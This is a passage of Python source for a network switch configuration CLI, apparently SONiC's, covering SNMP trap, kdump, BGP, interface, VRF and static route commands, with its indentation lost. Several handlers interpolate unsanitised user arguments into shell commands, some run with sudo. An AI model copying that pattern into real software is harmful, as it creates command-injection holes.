config_db.mod_entry('SNMP_TRAP_CONFIG',"v2TrapDest",{"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
else:
config_db.mod_entry('SNMP_TRAP_CONFIG',"v3TrapDest",{"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
cmd="systemctl restart snmp"
os.system (cmd)
@snmptrap.command('del')
@click.argument('ver', metavar='<SNMP Version>', type=click.Choice(['1', '2', '3']), required=True)
@click.pass_context
def delete_snmptrap_server(ctx, ver):
"""Delete the SNMP Trap server configuration"""
config_db = ctx.obj['db']
if ver == "1":
config_db.mod_entry('SNMP_TRAP_CONFIG',"v1TrapDest",None)
elif ver == "2":
config_db.mod_entry('SNMP_TRAP_CONFIG',"v2TrapDest",None)
else:
config_db.mod_entry('SNMP_TRAP_CONFIG',"v3TrapDest",None)
cmd="systemctl restart snmp"
os.system (cmd)
#
# 'bgp' group ('config bgp ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def bgp():
"""BGP-related configuration tasks"""
pass
#
# 'shutdown' subgroup ('config bgp shutdown ...')
#
@bgp.group(cls=clicommon.AbbreviationGroup)
def shutdown():
"""Shut down BGP session(s)"""
pass
@config.group(cls=clicommon.AbbreviationGroup)
def kdump():
""" Configure kdump """
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
@kdump.command()
def disable():
"""Disable kdump operation"""
config_db = ConfigDBConnector()
if config_db is not None:
config_db.connect()
config_db.mod_entry("KDUMP", "config", {"enabled": "false"})
clicommon.run_command("sonic-kdump-config --disable")
@kdump.command()
def enable():
"""Enable kdump operation"""
config_db = ConfigDBConnector()
if config_db is not None:
config_db.connect()
config_db.mod_entry("KDUMP", "config", {"enabled": "true"})
clicommon.run_command("sonic-kdump-config --enable")
@kdump.command()
@click.argument('kdump_memory', metavar='<kdump_memory>', required=True)
def memory(kdump_memory):
"""Set memory allocated for kdump capture kernel"""
config_db = ConfigDBConnector()
if config_db is not None:
config_db.connect()
config_db.mod_entry("KDUMP", "config", {"memory": kdump_memory})
clicommon.run_command("sonic-kdump-config --memory %s" % kdump_memory)
@kdump.command('num-dumps')
@click.argument('kdump_num_dumps', metavar='<kdump_num_dumps>', required=True, type=int)
def num_dumps(kdump_num_dumps):
"""Set max number of dump files for kdump"""
config_db = ConfigDBConnector()
if config_db is not None:
config_db.connect()
config_db.mod_entry("KDUMP", "config", {"num_dumps": kdump_num_dumps})
clicommon.run_command("sonic-kdump-config --num_dumps %d" % kdump_num_dumps)
# 'all' subcommand
@shutdown.command()
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def all(verbose):
"""Shut down all BGP sessions
In the case of Multi-Asic platform, we shut only the EBGP sessions with external neighbors.
"""
log.log_info("'bgp shutdown all' executing...")
namespaces = [DEFAULT_NAMESPACE]
ignore_local_hosts = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns']
ignore_local_hosts = True
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi ASIC) and do the sepcified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
bgp_neighbor_ip_list = _get_all_neighbor_ipaddresses(config_db, ignore_local_hosts)
for ipaddress in bgp_neighbor_ip_list:
_change_bgp_session_status_by_addr(config_db, ipaddress, 'down', verbose)
# 'neighbor' subcommand
@shutdown.command()
@click.argument('ipaddr_or_hostname', metavar='<ipaddr_or_hostname>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def neighbor(ipaddr_or_hostname, verbose):
"""Shut down BGP session by neighbor IP address or hostname.
User can specify either internal or external BGP neighbor to shutdown
"""
log.log_info("'bgp shutdown neighbor {}' executing...".format(ipaddr_or_hostname))
namespaces = [DEFAULT_NAMESPACE]
found_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi ASIC) and do the sepcified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _change_bgp_session_status(config_db, ipaddr_or_hostname, 'down', verbose):
found_neighbor = True
if not found_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(ipaddr_or_hostname))
@bgp.group(cls=clicommon.AbbreviationGroup)
def startup():
"""Start up BGP session(s)"""
pass
# 'all' subcommand
@startup.command()
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def all(verbose):
"""Start up all BGP sessions
In the case of Multi-Asic platform, we startup only the EBGP sessions with external neighbors.
"""
log.log_info("'bgp startup all' executing...")
namespaces = [DEFAULT_NAMESPACE]
ignore_local_hosts = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns']
ignore_local_hosts = True
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi ASIC) and do the sepcified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
bgp_neighbor_ip_list = _get_all_neighbor_ipaddresses(config_db, ignore_local_hosts)
for ipaddress in bgp_neighbor_ip_list:
_change_bgp_session_status_by_addr(config_db, ipaddress, 'up', verbose)
# 'neighbor' subcommand
@startup.command()
@click.argument('ipaddr_or_hostname', metavar='<ipaddr_or_hostname>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def neighbor(ipaddr_or_hostname, verbose):
log.log_info("'bgp startup neighbor {}' executing...".format(ipaddr_or_hostname))
"""Start up BGP session by neighbor IP address or hostname.
User can specify either internal or external BGP neighbor to startup
"""
namespaces = [DEFAULT_NAMESPACE]
found_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi ASIC) and do the sepcified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _change_bgp_session_status(config_db, ipaddr_or_hostname, 'up', verbose):
found_neighbor = True
if not found_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(ipaddr_or_hostname))
#
# 'remove' subgroup ('config bgp remove ...')
#
@bgp.group(cls=clicommon.AbbreviationGroup)
def remove():
"Remove BGP neighbor configuration from the device"
pass
@remove.command('neighbor')
@click.argument('neighbor_ip_or_hostname', metavar='<neighbor_ip_or_hostname>', required=True)
def remove_neighbor(neighbor_ip_or_hostname):
"""Deletes BGP neighbor configuration of given hostname or ip from devices
User can specify either internal or external BGP neighbor to remove
"""
namespaces = [DEFAULT_NAMESPACE]
removed_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi ASIC) and do the sepcified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _remove_bgp_neighbor_config(config_db, neighbor_ip_or_hostname):
removed_neighbor = True
if not removed_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(neighbor_ip_or_hostname))
#
# 'interface' group ('config interface ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
# TODO add "hidden=True if this is a single ASIC platform, once we have click 7.0 in all branches.
@click.option('-n', '--namespace', help='Namespace name',
required=True if multi_asic.is_multi_asic() else False, type=click.Choice(multi_asic.get_namespace_list()))
@click.pass_context
def interface(ctx, namespace):
"""Interface-related configuration tasks"""
# Set namespace to default_namespace if it is None.
if namespace is None:
namespace = DEFAULT_NAMESPACE
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=str(namespace))
config_db.connect()
ctx.obj = {'config_db': config_db, 'namespace': str(namespace)}
#
# 'startup' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def startup(ctx, interface_name):
"""Start up interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
intf_fs = parse_interface_in_filter(interface_name)
if len(intf_fs) > 1 and multi_asic.is_multi_asic():
ctx.fail("Interface range not supported in multi-asic platforms !!")
if len(intf_fs) == 1 and interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
log.log_info("'interface startup {}' executing...".format(interface_name))
port_dict = config_db.get_table('PORT')
for port_name in port_dict.keys():
if port_name in intf_fs:
config_db.mod_entry("PORT", port_name, {"admin_status": "up"})
portchannel_list = config_db.get_table("PORTCHANNEL")
for po_name in portchannel_list.keys():
if po_name in intf_fs:
config_db.mod_entry("PORTCHANNEL", po_name, {"admin_status": "up"})
subport_list = config_db.get_table("VLAN_SUB_INTERFACE")
for sp_name in subport_list.keys():
if sp_name in intf_fs:
config_db.mod_entry("VLAN_SUB_INTERFACE", sp_name, {"admin_status": "up"})
#
# 'shutdown' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def shutdown(ctx, interface_name):
"""Shut down interface"""
log.log_info("'interface shutdown {}' executing...".format(interface_name))
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
intf_fs = parse_interface_in_filter(interface_name)
if len(intf_fs) > 1 and multi_asic.is_multi_asic():
ctx.fail("Interface range not supported in multi-asic platforms !!")
if len(intf_fs) == 1 and interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
port_dict = config_db.get_table('PORT')
for port_name in port_dict.keys():
if port_name in intf_fs:
config_db.mod_entry("PORT", port_name, {"admin_status": "down"})
portchannel_list = config_db.get_table("PORTCHANNEL")
for po_name in portchannel_list.keys():
if po_name in intf_fs:
config_db.mod_entry("PORTCHANNEL", po_name, {"admin_status": "down"})
subport_list = config_db.get_table("VLAN_SUB_INTERFACE")
for sp_name in subport_list.keys():
if sp_name in intf_fs:
config_db.mod_entry("VLAN_SUB_INTERFACE", sp_name, {"admin_status": "down"})
#
# 'speed' subcommand
#
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_speed', metavar='<interface_speed>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def speed(ctx, interface_name, interface_speed, verbose):
"""Set interface speed"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
log.log_info("'interface speed {} {}' executing...".format(interface_name, interface_speed))
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -s {}".format(interface_name, interface_speed)
else:
command = "portconfig -p {} -s {} -n {}".format(interface_name, interface_speed, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'breakout' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('mode', required=True, type=click.STRING, autocompletion=_get_breakout_options)
@click.option('-f', '--force-remove-dependencies', is_flag=True, help='Clear all dependencies internally first.')
@click.option('-l', '--load-predefined-config', is_flag=True, help='load predefied user configuration (alias, lanes, speed etc) first.')
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false, expose_value=False, prompt='Do you want to Breakout the port, continue?')
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
@click.pass_context
def breakout(ctx, interface_name, mode, verbose, force_remove_dependencies, load_predefined_config):
""" Set interface breakout mode """
breakout_cfg_file = device_info.get_path_to_port_config_file()
if not os.path.isfile(breakout_cfg_file) or not breakout_cfg_file.endswith('.json'):
click.secho("[ERROR] Breakout feature is not available without platform.json file", fg='red')
raise click.Abort()
# Get the config_db connector
config_db = ctx.obj['config_db']
target_brkout_mode = mode
# Get current breakout mode
cur_brkout_dict = config_db.get_table('BREAKOUT_CFG')
cur_brkout_mode = cur_brkout_dict[interface_name]["brkout_mode"]
# Validate Interface and Breakout mode
if not _validate_interface_mode(ctx, breakout_cfg_file, interface_name, mode, cur_brkout_mode):
raise click.Abort()
""" Interface Deletion Logic """
# Get list of interfaces to be deleted
del_ports = get_child_ports(interface_name, cur_brkout_mode, breakout_cfg_file)
del_intf_dict = {intf: del_ports[intf]["speed"] for intf in del_ports}
if del_intf_dict:
""" shut down all the interface before deletion """
ret = shutdown_interfaces(ctx, del_intf_dict)
if not ret:
raise click.Abort()
click.echo("\nPorts to be deleted : \n {}".format(json.dumps(del_intf_dict, indent=4)))
else:
click.secho("[ERROR] del_intf_dict is None! No interfaces are there to be deleted", fg='red')
raise click.Abort()
""" Interface Addition Logic """
# Get list of interfaces to be added
add_ports = get_child_ports(interface_name, target_brkout_mode, breakout_cfg_file)
add_intf_dict = {intf: add_ports[intf]["speed"] for intf in add_ports}
if add_intf_dict:
click.echo("Ports to be added : \n {}".format(json.dumps(add_intf_dict, indent=4)))
else:
click.secho("[ERROR] port_dict is None!", fg='red')
raise click.Abort()
""" Special Case: Dont delete those ports where the current mode and speed of the parent port
remains unchanged to limit the traffic impact """
click.secho("\nAfter running Logic to limit the impact", fg="cyan", underline=True)
matched_item = [intf for intf, speed in del_intf_dict.items() if intf in add_intf_dict.keys() and speed == add_intf_dict[intf]]
# Remove the interface which remains unchanged from both del_intf_dict and add_intf_dict
map(del_intf_dict.pop, matched_item)
map(add_intf_dict.pop, matched_item)
click.secho("\nFinal list of ports to be deleted : \n {} \nFinal list of ports to be added : \n {}".format(json.dumps(del_intf_dict, indent=4), json.dumps(add_intf_dict, indent=4), fg='green', blink=True))
if len(add_intf_dict.keys()) == 0:
click.secho("[ERROR] add_intf_dict is None! No interfaces are there to be added", fg='red')
raise click.Abort()
port_dict = {}
for intf in add_intf_dict:
if intf in add_ports.keys():
port_dict[intf] = add_ports[intf]
# writing JSON object
with open('new_port_config.json', 'w') as f:
json.dump(port_dict, f, indent=4)
# Start Interation with Dy Port BreakOut Config Mgmt
try:
""" Load config for the commands which are capable of change in config DB """
cm = load_ConfigMgmt(verbose)
""" Delete all ports if forced else print dependencies using ConfigMgmt API """
final_delPorts = [intf for intf in del_intf_dict.keys()]
""" Warn user if tables without yang models exist and have final_delPorts """
breakout_warnUser_extraTables(cm, final_delPorts, confirm=True)
# Create a dictionary containing all the added ports with its capabilities like alias, lanes, speed etc.
portJson = dict(); portJson['PORT'] = port_dict
# breakout_Ports will abort operation on failure, So no need to check return
breakout_Ports(cm, delPorts=final_delPorts, portJson=portJson, force=force_remove_dependencies, \
loadDefConfig=load_predefined_config, verbose=verbose)
# Set Current Breakout mode in config DB
brkout_cfg_keys = config_db.get_keys('BREAKOUT_CFG')
if interface_name.decode("utf-8") not in brkout_cfg_keys:
click.secho("[ERROR] {} is not present in 'BREAKOUT_CFG' Table!".\
format(interface_name), fg='red')
raise click.Abort()
config_db.set_entry("BREAKOUT_CFG", interface_name,\
{'brkout_mode': target_brkout_mode})
click.secho("Breakout process got successfully completed.".\
format(interface_name), fg="cyan", underline=True)
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
except Exception as e:
click.secho("Failed to break out Port. Error: {}".format(str(e)), \
fg='magenta')
sys.exit(0)
def _get_all_mgmtinterface_keys():
"""Returns list of strings containing mgmt interface keys
"""
config_db = ConfigDBConnector()
config_db.connect()
return config_db.get_table('MGMT_INTERFACE').keys()
def mgmt_ip_restart_services():
"""Restart the required services when mgmt inteface IP address is changed"""
"""
Whenever the eth0 IP address is changed, restart the "interfaces-config"
service which regenerates the /etc/network/interfaces file and restarts
the networking service to make the new/null IP address effective for eth0.
"ntp-config" service should also be restarted based on the new
eth0 IP address since the ntp.conf (generated from ntp.conf.j2) is
made to listen on that particular eth0 IP address or reset it back.
"""
cmd="systemctl restart interfaces-config"
os.system (cmd)
cmd="systemctl restart ntp-config"
os.system (cmd)
#
# 'mtu' subcommand
#
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_mtu', metavar='<interface_mtu>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def mtu(ctx, interface_name, interface_mtu, verbose):
"""Set interface mtu"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -m {}".format(interface_name, interface_mtu)
else:
command = "portconfig -p {} -m {} -n {}".format(interface_name, interface_mtu, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_fec', metavar='<interface_fec>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def fec(ctx, interface_name, interface_fec, verbose):
"""Set interface fec"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if interface_fec not in ["rs", "fc", "none"]:
ctx.fail("'fec not in ['rs', 'fc', 'none']!")
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -f {}".format(interface_name, interface_fec)
else:
command = "portconfig -p {} -f {} -n {}".format(interface_name, interface_fec, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'ip' subgroup ('config interface ip ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def ip(ctx):
"""Add or remove IP address"""
pass
#
# 'add' subcommand
#
@ip.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument("ip_addr", metavar="<ip_addr>", required=True)
@click.argument('gw', metavar='<default gateway IP address>', required=False)
@click.pass_context
def add(ctx, interface_name, ip_addr, gw):
"""Add an IP address towards the interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
try:
net = ipaddress.ip_network(unicode(ip_addr), strict=False)
if '/' not in ip_addr:
ip_addr = str(net)
if interface_name == 'eth0':
# Configuring more than 1 IPv4 or more than 1 IPv6 address fails.
# Allow only one IPv4 and only one IPv6 address to be configured for IPv6.
# If a row already exist, overwrite it (by doing delete and add).
mgmtintf_key_list = _get_all_mgmtinterface_keys()
for key in mgmtintf_key_list:
# For loop runs for max 2 rows, once for IPv4 and once for IPv6.
# No need to capture the exception since the ip_addr is already validated earlier
ip_input = ipaddress.ip_interface(ip_addr)
current_ip = ipaddress.ip_interface(key[1])
if (ip_input.version == current_ip.version):
# If user has configured IPv4/v6 address and the already available row is also IPv4/v6, delete it here.
config_db.set_entry("MGMT_INTERFACE", ("eth0", key[1]), None)
# Set the new row with new value
if not gw:
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), {"NULL": "NULL"})
else:
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), {"gwaddr": gw})
mgmt_ip_restart_services()
return
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
interface_entry = config_db.get_entry(table_name, interface_name)
if len(interface_entry) == 0:
if table_name == "VLAN_SUB_INTERFACE":
config_db.set_entry(table_name, interface_name, {"admin_status": "up"})
else:
config_db.set_entry(table_name, interface_name, {"NULL": "NULL"})
config_db.set_entry(table_name, (interface_name, ip_addr), {"NULL": "NULL"})
except ValueError:
ctx.fail("'ip_addr' is not valid.")
#
# 'del' subcommand
#
@ip.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument("ip_addr", metavar="<ip_addr>", required=True)
@click.pass_context
def remove(ctx, interface_name, ip_addr):
"""Remove an IP address from the interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
try:
net = ipaddress.ip_network(unicode(ip_addr), strict=False)
if '/' not in ip_addr:
ip_addr = str(net)
if interface_name == 'eth0':
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), None)
mgmt_ip_restart_services()
return
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
config_db.set_entry(table_name, (interface_name, ip_addr), None)
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
if len(interface_dependent) == 0 and is_interface_bind_to_vrf(config_db, interface_name) is False:
config_db.set_entry(table_name, interface_name, None)
if multi_asic.is_multi_asic():
command = "sudo ip netns exec {} ip neigh flush dev {} {}".format(ctx.obj['namespace'], interface_name, ip_addr)
else:
command = "ip neigh flush dev {} {}".format(interface_name, ip_addr)
clicommon.run_command(command)
except ValueError:
ctx.fail("'ip_addr' is not valid.")
#
# 'transceiver' subgroup ('config interface transceiver ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def transceiver(ctx):
"""SFP transceiver configuration"""
pass
#
# 'lpmode' subcommand ('config interface transceiver lpmode ...')
#
@transceiver.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('state', metavar='(enable|disable)', type=click.Choice(['enable', 'disable']))
@click.pass_context
def lpmode(ctx, interface_name, state):
"""Enable/disable low-power mode for SFP transceiver module"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
cmd = "sudo sfputil lpmode {} {}".format("on" if state == "enable" else "off", interface_name)
clicommon.run_command(cmd)
#
# 'reset' subcommand ('config interface reset ...')
#
@transceiver.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def reset(ctx, interface_name):
"""Reset SFP transceiver module"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
cmd = "sudo sfputil reset {}".format(interface_name)
clicommon.run_command(cmd)
#
# 'vrf' subgroup ('config interface vrf ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def vrf(ctx):
"""Bind or unbind VRF"""
pass
#
# 'bind' subcommand
#
@vrf.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def bind(ctx, interface_name, vrf_name):
"""Bind the interface to VRF"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
if is_interface_bind_to_vrf(config_db, interface_name) is True and \
config_db.get_entry(table_name, interface_name).get('vrf_name') == vrf_name:
return
# Clean ip addresses if interface configured
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
# When config_db del entry and then add entry with same key, the DEL will lost.
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
state_db = SonicV2Connector(use_unix_socket_path=True)
else:
state_db = SonicV2Connector(use_unix_socket_path=True, namespace=ctx.obj['namespace'])
state_db.connect(state_db.STATE_DB, False)
_hash = '{}{}'.format('INTERFACE_TABLE|', interface_name)
while state_db.get_all(state_db.STATE_DB, _hash) != None:
time.sleep(0.01)
state_db.close(state_db.STATE_DB)
config_db.set_entry(table_name, interface_name, {"vrf_name": vrf_name})
#
# 'unbind' subcommand
#
@vrf.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def unbind(ctx, interface_name):
"""Unbind the interface to VRF"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("interface is None!")
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
if is_interface_bind_to_vrf(config_db, interface_name) is False:
return
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
#
# 'vrf' group ('config vrf ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='vrf')
@click.pass_context
def vrf(ctx):
"""VRF-related configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {}
ctx.obj['config_db'] = config_db
@vrf.command('add')
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def add_vrf(ctx, vrf_name):
"""Add vrf"""
config_db = ctx.obj['config_db']
if not vrf_name.startswith("Vrf") and not (vrf_name == 'mgmt') and not (vrf_name == 'management'):
ctx.fail("'vrf_name' is not start with Vrf, mgmt or management!")
if len(vrf_name) > 15:
ctx.fail("'vrf_name' is too long!")
if (vrf_name == 'mgmt' or vrf_name == 'management'):
vrf_add_management_vrf(config_db)
else:
config_db.set_entry('VRF', vrf_name, {"NULL": "NULL"})
@vrf.command('del')
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def del_vrf(ctx, vrf_name):
"""Del vrf"""
config_db = ctx.obj['config_db']
if not vrf_name.startswith("Vrf") and not (vrf_name == 'mgmt') and not (vrf_name == 'management'):
ctx.fail("'vrf_name' is not start with Vrf, mgmt or management!")
if len(vrf_name) > 15:
ctx.fail("'vrf_name' is too long!")
if (vrf_name == 'mgmt' or vrf_name == 'management'):
vrf_delete_management_vrf(config_db)
else:
del_interface_bind_to_vrf(config_db, vrf_name)
config_db.set_entry('VRF', vrf_name, None)
#
# 'route' group ('config route ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def route(ctx):
"""route-related configuration tasks"""
pass
@route.command('add',context_settings={"ignore_unknown_options":True})
@click.argument('command_str', metavar='prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>', nargs=-1, type=click.Path())
@click.pass_context
def add_route(ctx, command_str):
"""Add route command"""
if len(command_str) < 4 or len(command_str) > 9:
ctx.fail("argument is not in pattern prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>!")
if "prefix" not in command_str:
ctx.fail("argument is incomplete, prefix not found!")
if "nexthop" not in command_str:
ctx.fail("argument is incomplete, nexthop not found!")
for i in range(0,len(command_str)):
if "nexthop" == command_str[i]:
prefix_str = command_str[:i]
nexthop_str = command_str[i:]
vrf_name = ""
cmd = 'sudo vtysh -c "configure terminal" -c "ip route'
if prefix_str:
if len(prefix_str) == 2:
prefix_mask = prefix_str[1]
cmd += ' {}'.format(prefix_mask)
elif len(prefix_str) == 4:
vrf_name = prefix_str[2]
prefix_mask = prefix_str[3]
cmd += ' {}'.format(prefix_mask)
else:
ctx.fail("prefix is not in pattern!")
if nexthop_str:
if len(nexthop_str) == 2:
ip = nexthop_str[1]
if vrf_name == "":
cmd += ' {}'.format(ip)
else:
cmd += ' {} vrf {}'.format(ip, vrf_name)
elif len(nexthop_str) == 3:
dev_name = nexthop_str[2]
if vrf_name == "":
cmd += ' {}'.format(dev_name)
else:
cmd += ' {} vrf {}'.format(dev_name, vrf_name)
elif len(nexthop_str) == 4:
vrf_name_dst = nexthop_str[2]
ip = nexthop_str[3]
if vrf_name == "":
cmd += ' {} nexthop-vrf {}'.format(ip, vrf_name_dst)
else:
cmd += ' {} vrf {} nexthop-vrf {}'.format(ip, vrf_name, vrf_name_dst)
else:
ctx.fail("nexthop is not in pattern!")
cmd += '"'
clicommon.run_command(cmd)
@route.command('del',context_settings={"ignore_unknown_options":True})
@click.argument('command_str', metavar='prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>', nargs=-1, type=click.Path())
@click.pass_context
def del_route(ctx, command_str):
"""Del route command"""
if len(command_str) < 4 or len(command_str) > 9:
ctx.fail("argument is not in pattern prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>!")
if "prefix" not in command_str:
ctx.fail("argument is incomplete, prefix not found!")
if "nexthop" not in command_str:
